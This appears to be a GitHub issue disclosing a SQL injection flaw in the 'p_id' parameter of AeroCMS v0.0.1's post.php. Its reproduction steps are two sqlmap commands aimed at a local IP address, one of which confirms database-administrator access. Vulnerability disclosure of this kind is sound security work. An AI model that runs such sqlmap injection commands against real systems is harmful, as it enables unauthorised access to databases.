Skip to content
This repository has been archived by the owner on May 8, 2023. It is now read-only.

AeroCMS v0.0.1 has a SQL injection vulnerability #9

Open
rockmelodies opened this issue Jan 28, 2023 · 0 comments
Open

AeroCMS v0.0.1 has a SQL injection vulnerability #9

rockmelodies opened this issue Jan 28, 2023 · 0 comments

Comments

@rockmelodies
Copy link

AeroCMS v0.0.1 was found to contain a SQL injection vulnerability via the 'p_id' parameter in post.php. The vulnerability allows an attacker to gain database administrator privileges and access database information without authentication. Wait a minute

  • Reproduce the process
    1.No login required. Execute sqlmap command: python3 sqlmap.py -u http://192.168.101.5/post.php?p_id=-1* -p "p_id", you can see that there is an SQL injection vulnerability in the p_id parameter
    image
  1. Execute sqlmap command: python3 sqlmap.py -u http://192.168.101.5/post.php?p_id=-1* -p "p_id" --is-dba,
    We can see "DBA: TRUE"
    image
  • Vulnerable code
    image
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant